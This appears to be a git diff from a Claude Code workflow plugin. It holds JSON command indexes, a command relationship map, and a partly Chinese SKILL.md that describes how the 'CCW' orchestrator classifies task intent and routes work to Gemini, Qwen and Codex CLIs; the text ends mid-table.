"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-full-cli.md"
},
{
"name": "docs-related-cli",
"command": "/memory:docs-related-cli",
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
"arguments": "[--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-related-cli.md"
},
{
"name": "docs",
"command": "/memory:docs",
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs.md"
},
{
"name": "load-skill-memory",
"command": "/memory:load-skill-memory",
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
"arguments": "[skill_name] \\\"task intent description\\",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load-skill-memory.md"
},
{
"name": "skill-memory",
"command": "/memory:skill-memory",
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/skill-memory.md"
},
{
"name": "style-skill-memory",
"command": "/memory:style-skill-memory",
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
"arguments": "[package-name] [--regenerate]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/style-skill-memory.md"
},
{
"name": "swagger-docs",
"command": "/memory:swagger-docs",
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/swagger-docs.md"
},
{
"name": "workflow-skill-memory",
"command": "/memory:workflow-skill-memory",
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
"arguments": "session <session-id> | all",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/workflow-skill-memory.md"
}
],
"analysis": [
{
"name": "review-fix",
"command": "/workflow:review-fix",
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-fix.md"
},
{
"name": "review-module-cycle",
"command": "/workflow:review-module-cycle",
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-module-cycle.md"
},
{
"name": "review",
"command": "/workflow:review",
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review.md"
}
],
"session-management": [
{
"name": "review-session-cycle",
"command": "/workflow:review-session-cycle",
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-session-cycle.md"
},
{
"name": "complete",
"command": "/workflow:session:complete",
"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/complete.md"
},
{
"name": "resume",
"command": "/workflow:session:resume",
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/resume.md"
}
],
"testing": [
{
"name": "tdd-verify",
"command": "/workflow:tdd-verify",
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
"arguments": "[optional: WFS-session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-verify.md"
},
{
"name": "test-fix-gen",
"command": "/workflow:test-fix-gen",
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-fix-gen.md"
},
{
"name": "test-gen",
"command": "/workflow:test-gen",
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
"arguments": "source-session-id",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-gen.md"
},
{
"name": "tdd-coverage-analysis",
"command": "/workflow:tools:tdd-coverage-analysis",
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
},
{
"name": "test-concept-enhanced",
"command": "/workflow:tools:test-concept-enhanced",
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
},
{
"name": "test-context-gather",
"command": "/workflow:tools:test-context-gather",
"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-context-gather.md"
}
]
}
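The index above groups command entries by `usage_scenario`, and every entry carries the same nine fields. A minimal sketch of a consistency check over such an index — the loader function and the sample data here are illustrative assumptions, not part of the shipped tooling:

```python
from collections import Counter

# Fields every command entry in the index is expected to carry.
REQUIRED = {"name", "command", "description", "arguments",
            "category", "subcategory", "usage_scenario", "difficulty", "source"}

def summarize(index: dict) -> Counter:
    """Count commands per usage scenario, raising on any entry with missing keys."""
    counts: Counter = Counter()
    for scenario, entries in index.items():
        for entry in entries:
            missing = REQUIRED - entry.keys()
            if missing:
                raise ValueError(f"{entry.get('command')}: missing {sorted(missing)}")
            counts[scenario] += 1
    return counts

# A one-entry sample shaped like the index above (in practice the dict
# would come from json.load() on the command index file).
index = {
    "testing": [{
        "name": "tdd-verify",
        "command": "/workflow:tdd-verify",
        "description": "Verify TDD workflow compliance",
        "arguments": "[optional: WFS-session-id]",
        "category": "workflow",
        "subcategory": None,
        "usage_scenario": "testing",
        "difficulty": "Advanced",
        "source": "../../../commands/workflow/tdd-verify.md",
    }],
}
print(summarize(index))
```

Running the check before publishing the index catches entries that drop a field during regeneration.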


@@ -1,160 +0,0 @@
{
"workflow:plan": {
"calls_internally": [
"workflow:session:start",
"workflow:tools:context-gather",
"workflow:tools:conflict-resolution",
"workflow:tools:task-generate-agent"
],
"next_steps": [
"workflow:action-plan-verify",
"workflow:status",
"workflow:execute"
],
"alternatives": [
"workflow:tdd-plan"
],
"prerequisites": []
},
"workflow:tdd-plan": {
"calls_internally": [
"workflow:session:start",
"workflow:tools:context-gather",
"workflow:tools:task-generate-tdd"
],
"next_steps": [
"workflow:tdd-verify",
"workflow:status",
"workflow:execute"
],
"alternatives": [
"workflow:plan"
],
"prerequisites": []
},
"workflow:execute": {
"prerequisites": [
"workflow:plan",
"workflow:tdd-plan"
],
"related": [
"workflow:status",
"workflow:resume"
],
"next_steps": [
"workflow:review",
"workflow:tdd-verify"
]
},
"workflow:action-plan-verify": {
"prerequisites": [
"workflow:plan"
],
"next_steps": [
"workflow:execute"
],
"related": [
"workflow:status"
]
},
"workflow:tdd-verify": {
"prerequisites": [
"workflow:execute"
],
"related": [
"workflow:tools:tdd-coverage-analysis"
]
},
"workflow:session:start": {
"next_steps": [
"workflow:plan",
"workflow:execute"
],
"related": [
"workflow:session:list",
"workflow:session:resume"
]
},
"workflow:session:resume": {
"alternatives": [
"workflow:resume"
],
"related": [
"workflow:session:list",
"workflow:status"
]
},
"workflow:lite-plan": {
"calls_internally": [
"workflow:lite-execute"
],
"next_steps": [
"workflow:lite-execute",
"workflow:status"
],
"alternatives": [
"workflow:plan"
],
"prerequisites": []
},
"workflow:lite-fix": {
"next_steps": [
"workflow:lite-execute",
"workflow:status"
],
"alternatives": [
"workflow:lite-plan"
],
"related": [
"workflow:test-cycle-execute"
]
},
"workflow:lite-execute": {
"prerequisites": [
"workflow:lite-plan",
"workflow:lite-fix"
],
"related": [
"workflow:execute",
"workflow:status"
]
},
"workflow:review-session-cycle": {
"prerequisites": [
"workflow:execute"
],
"next_steps": [
"workflow:review-fix"
],
"related": [
"workflow:review-module-cycle"
]
},
"workflow:review-fix": {
"prerequisites": [
"workflow:review-module-cycle",
"workflow:review-session-cycle"
],
"related": [
"workflow:test-cycle-execute"
]
},
"memory:docs": {
"calls_internally": [
"workflow:session:start",
"workflow:tools:context-gather"
],
"next_steps": [
"workflow:execute"
]
},
"memory:skill-memory": {
"next_steps": [
"workflow:plan",
"cli:analyze"
],
"related": [
"memory:load-skill-memory"
]
}
}
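The relationship map above links each command to its `calls_internally`, `next_steps`, `alternatives`, and `prerequisites`. A sketch of walking it to suggest follow-up commands — the helper name and the loading convention are assumptions for illustration:

```python
def next_steps(graph: dict, command: str) -> list:
    """Return the suggested follow-up commands for a command, or [] if none listed."""
    return graph.get(command, {}).get("next_steps", [])

# A fragment of the map above (in practice loaded with json.load()).
graph = {
    "workflow:plan": {
        "calls_internally": ["workflow:session:start", "workflow:tools:context-gather"],
        "next_steps": ["workflow:action-plan-verify", "workflow:status", "workflow:execute"],
        "alternatives": ["workflow:tdd-plan"],
        "prerequisites": [],
    },
}
print(next_steps(graph, "workflow:plan"))
```

The same lookup pattern applies to the other relation keys, which is what makes a flat JSON map like this convenient for driving "what next?" hints in a CLI.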


@@ -1,112 +0,0 @@
[
{
"name": "lite-plan",
"command": "/workflow:lite-plan",
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-plan.md"
},
{
"name": "lite-fix",
"command": "/workflow:lite-fix",
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-fix.md"
},
{
"name": "plan",
"command": "/workflow:plan",
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
"arguments": "\\\"text description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/plan.md"
},
{
"name": "execute",
"command": "/workflow:execute",
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
"arguments": "[--resume-session=\\\"session-id\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/execute.md"
},
{
"name": "start",
"command": "/workflow:session:start",
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/start.md"
},
{
"name": "review-session-cycle",
"command": "/workflow:review-session-cycle",
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-session-cycle.md"
},
{
"name": "docs",
"command": "/memory:docs",
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs.md"
},
{
"name": "artifacts",
"command": "/workflow:brainstorm:artifacts",
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
"arguments": "topic or challenge description [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/artifacts.md"
},
{
"name": "action-plan-verify",
"command": "/workflow:action-plan-verify",
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/action-plan-verify.md"
},
{
"name": "version",
"command": "/version",
"description": "Display Claude Code version information and check for updates",
"arguments": "",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/version.md"
}
]
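An index like the one above can be filtered client-side. The two-entry `commands` array below is an abbreviated stand-in for the full file, and `byScenario` is an illustrative helper, not part of the index:

```javascript
// Abbreviated stand-in for the command index above (two entries only).
const commands = [
  { name: "lite-plan", category: "workflow", usage_scenario: "planning", difficulty: "Intermediate" },
  { name: "version", category: "general", usage_scenario: "general", difficulty: "Beginner" }
]

// Select commands relevant to a given scenario; "general" commands always apply.
function byScenario(list, scenario) {
  return list.filter(c => c.usage_scenario === scenario || c.usage_scenario === "general")
}

console.log(byScenario(commands, "planning").map(c => c.name)) // → ["lite-plan", "version"]
```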


@@ -1,462 +1,352 @@
---
name: ccw
description: Stateless workflow orchestrator. Auto-selects optimal workflow based on task intent. Triggers "ccw", "workflow".
allowed-tools: Task(*), SlashCommand(*), AskUserQuestion(*), Read(*), Bash(*), Grep(*), TodoWrite(*)
---
# CCW - Claude Code Workflow Orchestrator
Stateless workflow orchestrator that automatically selects the optimal workflow based on task intent.
## Architecture
```
┌─────────────────────────────────────────────────────────────────┐
│ CCW Orchestrator (CLI-Enhanced + Requirement Analysis)          │
├─────────────────────────────────────────────────────────────────┤
│ Phase 1    │ Input Analysis (rule-based, fast path)             │
│ Phase 1.5  │ CLI Classification (semantic, smart path)          │
│ Phase 1.75 │ Requirement Clarification (clarity < 2)            │
│ Phase 2    │ Chain Selection (intent → workflow)                │
│ Phase 2.5  │ CLI Action Planning (high complexity)              │
│ Phase 3    │ User Confirmation (optional)                       │
│ Phase 4    │ TODO Tracking Setup                                │
│ Phase 5    │ Execution Loop                                     │
└─────────────────────────────────────────────────────────────────┘
```
## Workflow Combinations
### 1. Rapid ⚡
**Pattern**: multi-model collaborative analysis + direct execution
**Commands**: `/workflow:lite-plan` → `/workflow:lite-execute`
**When to use**:
- You know exactly what to build and how
- Single feature or small change
- Quick prototype validation
### 2. Full 📋
**Pattern**: analysis + brainstorming + planning + execution
**Commands**: `/workflow:brainstorm:auto-parallel` → `/workflow:plan` → `/workflow:execute`
**When to use**:
- Product direction or technical approach is uncertain
- Multi-role perspective analysis is needed
- Complex new feature development
### 3. Coupled 🔗
**Pattern**: full planning + verification + execution
**Commands**: `/workflow:plan` → `/workflow:action-plan-verify` → `/workflow:execute`
**When to use**:
- Cross-module dependencies
- Architecture-level changes
- Team collaboration projects
### 4. Bugfix 🐛
**Pattern**: intelligent diagnosis + fix
**Commands**: `/workflow:lite-fix` or `/workflow:lite-fix --hotfix`
**When to use**:
- Any bug with clear symptoms
- Urgent production-incident fixes
- Unclear root cause that needs diagnosis
### 5. Issue (Long-Running Multi-Point Fixes) 📌
**Pattern**: issue planning + queue + batch execution
**Commands**: `/issue:plan` → `/issue:queue` → `/issue:execute`
**When to use**:
- Multiple related problems to process in batch
- Fix work spanning a long time horizon
- Prioritization and conflict resolution are needed
### 6. UI-First 🎨
**Pattern**: UI design + planning + execution
**Commands**: `/workflow:ui-design:*` → `/workflow:plan` → `/workflow:execute`
**When to use**:
- Frontend feature development
- Visual references are needed
- Design-system integration
## Intent Classification
```javascript
function classifyIntent(input) {
const text = input.toLowerCase()
// Priority 1: Bug keywords
if (/\b(fix|bug|error|issue|crash|broken|fail|wrong|incorrect)\b/.test(text)) {
if (/\b(hotfix|urgent|production|critical|emergency)\b/.test(text)) {
return { type: 'bugfix', mode: 'hotfix', workflow: 'lite-fix --hotfix' }
}
return { type: 'bugfix', mode: 'standard', workflow: 'lite-fix' }
}
// Priority 2: Issue batch keywords
if (/\b(issues?|batch|queue|多个|批量)\b/.test(text) && /\b(fix|resolve|处理)\b/.test(text)) {
return { type: 'issue', workflow: 'issue:plan → issue:queue → issue:execute' }
}
// Priority 3: Uncertainty keywords → Full workflow
if (/\b(不确定|不知道|explore|研究|分析一下|怎么做|what if|should i|探索)\b/.test(text)) {
return { type: 'exploration', workflow: 'brainstorm → plan → execute' }
}
// Priority 4: UI/Design keywords
if (/\b(ui|界面|design|设计|component|组件|style|样式|layout|布局)\b/.test(text)) {
return { type: 'ui', workflow: 'ui-design → plan → execute' }
}
// Priority 5: Complexity assessment for remaining
const complexity = assessComplexity(text)
if (complexity === 'high') {
return { type: 'feature', complexity: 'high', workflow: 'plan → verify → execute' }
}
if (complexity === 'medium') {
return { type: 'feature', complexity: 'medium', workflow: 'lite-plan → lite-execute' }
}
return { type: 'feature', complexity: 'low', workflow: 'lite-plan → lite-execute' }
}
```
### Priority Order
| Priority | Intent | Patterns | Flow |
|----------|--------|----------|------|
| 1 | bugfix/hotfix | `urgent,production,critical` + bug | `bugfix.hotfix` |
| 1 | bugfix | `fix,bug,error,crash,fail` | `bugfix.standard` |
| 2 | issue batch | `issues,batch` + `fix,resolve` | `issue` |
| 3 | exploration | `不确定,explore,研究,what if` | `full` |
| 3 | multi-perspective | `多视角,权衡,比较方案,cross-verify` | `multi-cli-plan` |
| 4 | quick-task | `快速,简单,small,quick` + feature | `lite-lite-lite` |
| 5 | ui design | `ui,design,component,style` | `ui` |
| 6 | tdd | `tdd,test-driven,先写测试` | `tdd` |
| 7 | review | `review,审查,code review` | `review-fix` |
| 8 | documentation | `文档,docs,readme` | `docs` |
| 99 | feature | complexity-based | `rapid`/`coupled` |
### Complexity Assessment
```javascript
function assessComplexity(text) {
  let score = 0
  if (/refactor|重构|migrate|迁移|architect|架构|system|系统/.test(text)) score += 2
  if (/multiple|多个|across|跨|all|所有|entire|整个/.test(text)) score += 2
  if (/integrate|集成|api|database|数据库/.test(text)) score += 1
  if (/security|安全|performance|性能|scale|扩展/.test(text)) score += 1
  return score >= 4 ? 'high' : score >= 2 ? 'medium' : 'low'
}
```
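As a sanity check, the scoring above can be exercised directly (the function is reproduced verbatim so the snippet runs standalone):

```javascript
function assessComplexity(text) {
  let score = 0
  if (/refactor|重构|migrate|迁移|architect|架构|system|系统/.test(text)) score += 2
  if (/multiple|多个|across|跨|all|所有|entire|整个/.test(text)) score += 2
  if (/integrate|集成|api|database|数据库/.test(text)) score += 1
  if (/security|安全|performance|性能|scale|扩展/.test(text)) score += 1
  return score >= 4 ? 'high' : score >= 2 ? 'medium' : 'low'
}

console.log(assessComplexity("refactor the entire auth system"))        // → "high" (2 + 2)
console.log(assessComplexity("add security checks to the database api")) // → "medium" (1 + 1)
console.log(assessComplexity("fix a typo in the readme"))                // → "low" (0)
```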
| Complexity | Flow |
|------------|------|
| high | `coupled` (plan → verify → execute) |
| medium/low | `rapid` (lite-plan → lite-execute) |
### Dimension Extraction (WHAT/WHERE/WHY/HOW)
Four dimensions are extracted from user input to drive requirement clarification and workflow selection:
| Dimension | Extracted Content | Example Patterns |
|------|----------|----------|
| **WHAT** | action + target | `创建/修复/重构/优化/分析` + target object |
| **WHERE** | scope + paths | `file/module/system` + file paths |
| **WHY** | goal + motivation | `为了.../因为.../目的是...` |
| **HOW** | constraints + preferences | `必须.../不要.../应该...` |
**Clarity Score** (0-3):
- +0.5: explicit action present
- +0.5: concrete target present
- +0.5: file paths present
- +0.5: scope is not unknown
- +0.5: explicit goal present
- +0.5: constraints present
- -0.5: contains uncertainty words (`不知道/maybe/怎么`)
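The scoring rules above can be sketched as a small function. The `dims` object shape (and the `raw` field used for the uncertainty check) is assumed for illustration:

```javascript
// Sketch of the clarity score; the `dims` shape is illustrative.
function clarityScore(dims) {
  let s = 0
  if (dims.action) s += 0.5                                // explicit action
  if (dims.target) s += 0.5                                // concrete target
  if (dims.paths && dims.paths.length) s += 0.5            // file paths present
  if (dims.scope !== 'unknown') s += 0.5                   // known scope
  if (dims.goal) s += 0.5                                  // explicit goal
  if (dims.constraints && dims.constraints.length) s += 0.5 // constraints present
  if (/不知道|maybe|怎么/.test(dims.raw || '')) s -= 0.5    // uncertainty words
  return s
}

const dims = { action: '修复', target: 'login 401', paths: [], scope: 'unknown', goal: null, constraints: [], raw: '修复 login 401' }
console.log(clarityScore(dims)) // → 1, below the 2.0 threshold, so clarification triggers
```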
### Requirement Clarification
Requirement clarification is triggered when `clarity_score < 2`:
```javascript
if (dimensions.clarity_score < 2) {
  const questions = generateClarificationQuestions(dimensions)
  // Generate questions: what is the goal? what is the scope? what are the constraints?
  AskUserQuestion({ questions })
}
```
**Clarification question types**:
- Unclear target → "What do you want to operate on?"
- Unclear scope → "What is the scope of the operation?"
- Unclear goal → "What is the main goal of this operation?"
- Complex operation → "Any special requirements or constraints?"
## TODO Tracking Protocol
### CRITICAL: Append-Only Rule
Todos created by CCW **must be appended to the existing list**; never overwrite the user's other todos.
### Implementation
```javascript
// 1. Isolate workflow todos with a CCW prefix
const prefix = `CCW:${flowName}`
// 2. Use the prefix format when creating new todos
TodoWrite({
  todos: [
    ...existingNonCCWTodos,  // keep the user's own todos
    { content: `${prefix}: [1/N] /command:step1`, status: "in_progress", activeForm: "..." },
    { content: `${prefix}: [2/N] /command:step2`, status: "pending", activeForm: "..." }
  ]
})
// 3. When updating status, only touch todos matching the prefix
```
### Todo Format
```
CCW:{flow}: [{N}/{Total}] /command:name
```
### Visual Example
```
✓ CCW:rapid: [1/2] /workflow:lite-plan
→ CCW:rapid: [2/2] /workflow:lite-execute
(user's own todos remain untouched)
```
### Status Management
- Workflow start: create todos for all steps, first step `in_progress`
- Step done: current step `completed`, next step `in_progress`
- Workflow end: mark all CCW todos `completed`
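The append-only rule can be sketched as a pure list transform. The todo shape follows the `TodoWrite` example above; `markStepDone` is an illustrative helper name:

```javascript
// Advance a CCW workflow: complete step n, start step n+1.
// Non-CCW todos pass through untouched (append-only rule).
function markStepDone(todos, flowName, n) {
  const donePrefix = `CCW:${flowName}: [${n}/`
  const nextPrefix = `CCW:${flowName}: [${n + 1}/`
  return todos.map(t => {
    if (t.content.startsWith(donePrefix)) return { ...t, status: 'completed' }
    if (t.content.startsWith(nextPrefix)) return { ...t, status: 'in_progress' }
    return t
  })
}

const todos = [
  { content: 'Buy milk', status: 'pending' }, // user's own todo, untouched
  { content: 'CCW:rapid: [1/2] /workflow:lite-plan', status: 'in_progress' },
  { content: 'CCW:rapid: [2/2] /workflow:lite-execute', status: 'pending' }
]
console.log(markStepDone(todos, 'rapid', 1).map(t => t.status))
// → ['pending', 'completed', 'in_progress']
```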
## Execution Flow
```javascript
// 1. Check explicit command
if (input.startsWith('/workflow:') || input.startsWith('/issue:')) {
  // User explicitly requested a workflow, pass through
  SlashCommand(input)
  return
}

// 2. Classify intent
const intent = classifyIntent(input)  // See command.json intent_rules

// 3. Select flow
const flow = selectFlow(intent)  // See command.json flows

// 4. Create todos with CCW prefix
createWorkflowTodos(flow)

// 5. Dispatch first command
SlashCommand(flow.steps[0].command, args: input)
```
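A minimal sketch of the flow-selection step, assuming a trimmed-down `flows` table like the one in command.json. The mapping below is illustrative, not the full rule set:

```javascript
// Abbreviated flows table (full definitions live in command.json).
const flows = {
  rapid:   { steps: ['/workflow:lite-plan', '/workflow:lite-execute'] },
  coupled: { steps: ['/workflow:plan', '/workflow:action-plan-verify', '/workflow:execute'] },
  bugfix:  { steps: ['/workflow:lite-fix'] }
}

// Intent → flow: bugs go to bugfix; otherwise complexity decides rapid vs coupled.
function selectFlow(intent) {
  if (intent.type === 'bugfix') return flows.bugfix
  return intent.complexity === 'high' ? flows.coupled : flows.rapid
}

console.log(selectFlow({ type: 'feature', complexity: 'high' }).steps[0]) // → "/workflow:plan"
```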
## CLI Tool Integration
CCW automatically injects CLI calls under specific conditions:

| Condition | CLI Inject |
|-----------|------------|
| Large code context (≥50k chars) | `gemini --mode analysis` |
| High-complexity task | `gemini --mode analysis` |
| Bug diagnosis | `gemini --mode analysis` |
| Multi-task execution (≥3 tasks) | `codex --mode write` |

CLI tools run in separate processes, so they can digest large code contexts without consuming main-session tokens. Different models have different strengths, and CCW auto-selects by task type:

| Tool | Core Strengths | Best For | Trigger Keywords |
|------|----------------|----------|------------------|
| Gemini | Very long context, deep analysis, architecture understanding, execution-flow tracing | Codebase comprehension, architecture assessment, root-cause analysis | "分析", "理解", "设计", "架构", "诊断" |
| Qwen | Code pattern recognition, multi-dimensional analysis | Gemini fallback, second-perspective verification | "评估", "对比", "验证" |
| Codex | Precise code generation, autonomous execution, mathematical reasoning | Feature implementation, refactoring, tests | "实现", "重构", "修复", "生成", "测试" |

### CLI Enhancement Phases

**Phase 1.5: CLI-Assisted Classification**

When rule matching is inconclusive, classification falls back to a CLI:

| Trigger | Meaning |
|---------|---------|
| matchCount < 2 | Intent pattern matching is ambiguous |
| complexity = high | High-complexity task |
| input > 100 chars | Long input needs semantic understanding |

**Phase 2.5: CLI-Assisted Action Planning**

Workflow refinement for high-complexity tasks:

| Trigger | Meaning |
|---------|---------|
| complexity = high | High-complexity task |
| steps >= 3 | Multi-step workflow |
| input > 200 chars | Complex requirement description |

The CLI may return a recommendation: `use_default` | `modify` (adjust steps) | `upgrade` (upgrade the workflow)
### Implicit Injection Rules

CCW injects CLI calls automatically when the following conditions hold (no explicit user request needed):
```javascript
const implicitRules = {
  // Context gathering: use a CLI for large code volumes to save main-session tokens
  context_gathering: {
    trigger: 'file_read >= 50k chars OR module_count >= 5',
    inject: 'gemini --mode analysis'
  },
  // Pre-planning analysis: analyze complex tasks with a CLI first
  pre_planning_analysis: {
    trigger: 'complexity === "high" OR intent === "exploration"',
    inject: 'gemini --mode analysis'
  },
  // Debug diagnosis: leverage Gemini's execution-flow tracing
  debug_diagnosis: {
    trigger: 'intent === "bugfix" AND root_cause_unclear',
    inject: 'gemini --mode analysis'
  },
  // Code review: use a CLI to reduce token usage
  code_review: {
    trigger: 'step === "review"',
    inject: 'gemini --mode analysis'
  },
  // Multi-task execution: let Codex complete autonomously
  implementation: {
    trigger: 'step === "execute" AND task_count >= 3',
    inject: 'codex --mode write'
  }
}
```
### Semantic Tool Assignment
```javascript
// Users can state a tool preference in natural language
const toolHints = {
  gemini: /用\s*gemini|gemini\s*分析|让\s*gemini|深度分析|架构理解/i,
  qwen: /用\s*qwen|qwen\s*评估|让\s*qwen|第二视角/i,
  codex: /用\s*codex|codex\s*实现|让\s*codex|自主完成|批量修改/i
}
function detectToolPreference(input) {
  for (const [tool, pattern] of Object.entries(toolHints)) {
    if (pattern.test(input)) return tool
  }
  return null // Auto-select based on task type
}
```
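For example, running the detector against a couple of inputs (the hint table and function are reproduced verbatim so the snippet runs as-is):

```javascript
const toolHints = {
  gemini: /用\s*gemini|gemini\s*分析|让\s*gemini|深度分析|架构理解/i,
  qwen: /用\s*qwen|qwen\s*评估|让\s*qwen|第二视角/i,
  codex: /用\s*codex|codex\s*实现|让\s*codex|自主完成|批量修改/i
}

function detectToolPreference(input) {
  for (const [tool, pattern] of Object.entries(toolHints)) {
    if (pattern.test(input)) return tool
  }
  return null // no explicit preference: auto-select based on task type
}

console.log(detectToolPreference('用 gemini 分析现有架构')) // → "gemini"
console.log(detectToolPreference('修复登录问题'))           // → null
```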
### Standalone CLI Workflows

Invoke a CLI directly for specific tasks:

| Workflow | Command | Purpose |
|----------|---------|---------|
